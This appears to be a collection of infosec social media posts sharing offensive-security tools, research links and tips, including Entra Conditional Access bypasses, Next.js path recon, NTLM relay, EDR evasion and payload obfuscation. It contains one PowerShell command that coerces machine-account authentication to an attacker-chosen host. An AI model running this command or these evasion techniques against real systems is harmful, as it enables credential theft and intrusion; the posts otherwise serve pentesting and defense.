🧙 We built Grimoire: a single search box for every offensive playbook, fully offline.
Type ssrf, kerberoast, jwt, sudo and instantly hit the right page across more than 100 curated sources at once. 🔍⚡
I finally came around and documented all the Conditional Access bypasses in a single blog post. It contains not only the documented bypasses, but also the results of new research.
#Entra #ConditionalAccess #Security #Cheese
https://t.co/YWBfY0NhHl
Use NextJS? Recon ✨
A quick way to find "all" paths for Next.js websites:
DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
Cred = https://t.co/4hiJXDNlmU
#infosec #cybersec #bugbountytips
So I have been told threat actors use my Browser Cache Smuggling technique to compromise people: https://t.co/A9qn5HGZJ9
Remember, detection is really easy: any process touching a browser's cache file and moving it to a .dll one IS A RED FLAG. Detection rule is easy to set ;)!
Today, together with Jonathan Elkabas, we're releasing EntraGoat - A Deliberately Vulnerable Entra ID Environment.
Your own hands-on Entra lab for identity attack simulation.
Built for red teams, blue teams and identity nerds.
Check it out here👉https://t.co/5qlXQiSYHS
Built a small CVE monitoring tool (with help from AI).
GitHub PoCs, Nuclei, product search.
Feedback & bug reports welcome 🙏
👉 https://t.co/lmYOL40A2u
#infosec #bugbounty #cybersecurity #opensource #CVE
🎉 It is finally time for a new blog post! 🎉
Join us on our deep dive into Windows Authentication Coercion and its current state in 2025, including some brand-new tooling ✨ #itsec #infosec #pentest #redteam
https://t.co/ESePMwDIoc
Did you know you don't need to use a Potato exploit to go from an IIS AppPool account to admin or SYSTEM?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coercion of the machine account.
👇🧵
My personal internal pentest “dirty dozen” list (aka the most dangerous and common internal findings)
*not necessarily in any particular order
1. ESC1
2. ESC4
3. ESC8
4. Kerberoastable admins with weak passwords
5. Plaintext admin or SQL credentials on file shares
6. Insecure nested groups
7. Insecure permissions on a Tier 0 resource
8. Unattend file with valid local admin creds
9. Scheduled tasks running as Tier 0 accounts
10. Services running as SYSTEM with modifiable binaries or paths
11. No LAPS and all local admin passwords the same
12. Domain Admins logged into non-DCs
You have got a valid NTLM relay but SMB and LDAP are signed, LDAPS has got Channel Binding and ESC8 is not available... What about WinRMS? :D
Blogpost: https://t.co/p2uwj2yKTQ
Tool: https://t.co/zMPpwtyFir
And also, big thanks to jmk (Joe Mondloch) for the collab' :D!
NetExec v1.4.0 has been released! 🎉
There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system
And much more!
Full rundown:
https://t.co/yjaG8rgzSZ
Unveiling the Power of Intune - @TEMP43487580
Slides: https://t.co/l1jZZI9lrN
Pytune is a post-exploitation tool for enrolling a fake device into Intune with multiple platform support.
https://t.co/S3QnuyyJ77
Exploits often fail because payloads are blocked before they even reach the target ❌
Learn how to disguise your scripts with payload obfuscation techniques such as URL encoding, variable expression assignment and obfuscation in shell environments 👇
https://t.co/vQYSjAKwlt
By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.
My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.
Here’s what I found and why it matters 👉 https://t.co/VpMttDZI9K
Glad to publish a blog post on a critical vulnerability I found some months ago in GLPI, which impacts all default installations below a certain version:
https://t.co/PgleiQEK6e
We also released a tool that implements some checks for known vulnerabilities:
https://t.co/DhcvjJ7ZQy